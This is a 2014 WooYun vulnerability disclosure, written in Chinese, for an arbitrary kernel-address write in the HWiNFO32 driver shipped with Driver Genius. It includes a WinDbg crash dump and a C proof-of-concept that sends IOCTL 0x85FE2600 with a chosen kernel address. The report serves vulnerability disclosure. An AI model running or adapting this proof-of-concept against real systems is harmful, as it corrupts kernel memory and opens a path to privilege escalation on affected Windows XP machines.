当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077279

漏洞标题:HWiNFO32驱动任意地址写固定数据

相关厂商:驱动精灵

漏洞作者: ywledoc

提交时间:2014-09-29 17:45

修复时间:2014-12-28 17:46

公开时间:2014-12-28 17:46

漏洞类型:权限提升

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

HWiNFO32驱动过滤不严,造成任意地址写固定数据漏洞。驱动精灵中包含HWiNFO32,其名称为Mydriver32.sys

详细说明:

对DeviceIoControl例程中,当IoControlCode=0x85FE2600时,不严格过滤用户传入的 lpOutBuffer参数,直接调用nt!IopfCompleteRequest后,经过一系列处理,最终在nt!IopCompleteRequest产生漏洞,可写任意地址。
因其最终引发在nt!IopCompleteRequest,所以也于系统相关经测试xpsp3可正常利用,win7则没有影响。

漏洞证明:

windbg崩溃信息。

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffff0000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 804ed09b, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
WRITE_ADDRESS: ffff0000
FAULTING_IP:
nt!IopCompleteRequest+92
804ed09b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: CODE_CORRUPTION
BUGCHECK_STR: 0x50
PROCESS_NAME: TestMyDriver32_
IRP_ADDRESS: 82177f68
DEVICE_OBJECT: 81d5f518
DRIVER_OBJECT: 81d26288
IMAGE_NAME: DgSafe.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 540684f3
MODULE_NAME: DgSafe
FAULTING_MODULE: b1250000 mydrivers32
TRAP_FRAME: b137f91c -- (.trap 0xffffffffb137f91c)
ErrCode = 00000002
eax=00000110 ebx=82177f68 ecx=00000044 edx=00000001 esi=81f24680 edi=ffff0000
eip=804ed09b esp=b137f990 ebp=b137f9d4 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
nt!IopCompleteRequest+0x92:
804ed09b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope
LAST_CONTROL_TRANSFER: from 80533797 to 804e450a
STACK_TEXT:
b137f46c 80533797 00000003 ffff0000 00000000 nt!RtlpBreakWithStatusInstruction
b137f4b8 8053426e 00000003 806f2298 c03fffc0 nt!KiBugCheckDebugBreak+0x19
b137f898 8053485e 00000050 ffff0000 00000001 nt!KeBugCheck2+0x574
b137f8b8 805251a8 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b137f904 804e2747 00000001 ffff0000 00000000 nt!MmAccessFault+0x6f5
b137f904 804ed09b 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b137f9d4 804ed11a 82177fa8 b137fa20 b137fa14 nt!IopCompleteRequest+0x92
b137fa24 806f2c35 00000000 00000000 b137fa3c nt!KiDeliverApc+0xb3
b137fa24 806f2861 00000000 00000000 b137fa3c hal!HalpApcInterrupt+0xc5
b137faac 804e63cc 82177fa8 82177f68 00000000 hal!KeReleaseInStackQueuedSpinLock+0x11
b137facc 804ed134 82177fa8 81d2d588 00000000 nt!KeInsertQueueApc+0x4b
b137fb00 b1251f27 81d2d588 81d26288 82177f68 nt!IopfCompleteRequest+0x1d8
WARNING: Stack unwind information not available. Following frames may be wrong.
b137fc34 804e4767 81d5f518 82177f68 806f22d0 mydrivers32+0x1f27
b137fc44 805692ab 82177fd8 81d2d588 82177f68 nt!IopfCallDriver+0x31
b137fc58 805781e2 81d5f518 82177f68 81d2d588 nt!IopSynchronousServiceTail+0x70
b137fd00 8057a705 00000054 00000000 00000000 nt!IopXxxControlFile+0x611
b137fd34 804df7f8 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
b137fd34 7c92e514 00000054 00000000 00000000 nt!KiSystemServicePostCall
0013fed8 7c92d28a 7c801675 00000054 00000000 ntdll!KiFastSystemCallRet
0013fedc 7c801675 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
0013ff3c 00401058 00000054 85fe2600 0013ff68 kernel32!DeviceIoControl+0xdd
0013ff68 00401083 00000000 0040302c 78542201 TestMyDriver32_b!TestMyDriver32+0x58 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 29]
0013ff7c 0040120f 00000001 00033d48 000328b8 TestMyDriver32_b!wmain+0x13 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 37]
0013ffc0 7c816037 0558ee60 7c92d96e 7ffdf000 TestMyDriver32_b!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 579]
0013fff0 00000000 00401357 00000000 78746341 kernel32!BaseProcessStart+0x23
STACK_COMMAND: kb
CHKIMG_EXTENSION: !chkimg -lo 50 -d !nt
804df7da-804df7df 6 bytes - nt!KiSystemServiceAccessTeb+2c
[ 8b fc f6 45 72 02:e9 ce 15 b5 31 90 ]
80586896-80586899 4 bytes - nt!NtTerminateProcess+4b
[ ce f4 fd ff:ad 49 a9 31 ]
806319c6-806319c9 4 bytes - nt!NtTerminateJobObject+2d (+0xab130)
[ 9e 43 f3 ff:cd 98 9e 31 ]
14 errors : !nt (804df7da-806319c9)
FOLLOWUP_NAME: MachineOwner
MEMORY_CORRUPTOR: PATCH_DgSafe
FAILURE_BUCKET_ID: MEMORY_CORRUPTION_PATCH_DgSafe
BUCKET_ID: MEMORY_CORRUPTION_PATCH_DgSafe
Followup: MachineOwner
---------


利用测试代码:

VOID TestMyDriver32()
{
HANDLE hCreateFile = INVALID_HANDLE_VALUE;
DWORD dwInBuffer = 0x6c77792a;
DWORD dwOutBuffer = 0xf8be8020;//内核可写地址请自行更改
hCreateFile = CreateFileA("\\\\.\\HWiNFO32",
0, // no access to the drive
FILE_SHARE_READ | // share mode
FILE_SHARE_WRITE,
NULL, // default security attributes
OPEN_EXISTING, // disposition
0, // file attributes
NULL);
if (hCreateFile == INVALID_HANDLE_VALUE)
{
printf("Error Open Device!\n");
return ;
}
DeviceIoControl(hCreateFile, 0x85FE2600, (LPVOID)&dwInBuffer, 4, (LPVOID)dwOutBuffer, 0, &dwInBuffer, NULL);
CloseHandle(hCreateFile);
return;
}
int _tmain(int argc, _TCHAR* argv[])
{
char cSSS[10];
TestMyDriver32();
scanf("%s",cSSS);
return 0;
}


QQ图片20140925133039.jpg

修复方案:

开发人员更懂

版权声明:转载请注明来源 ywledoc@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝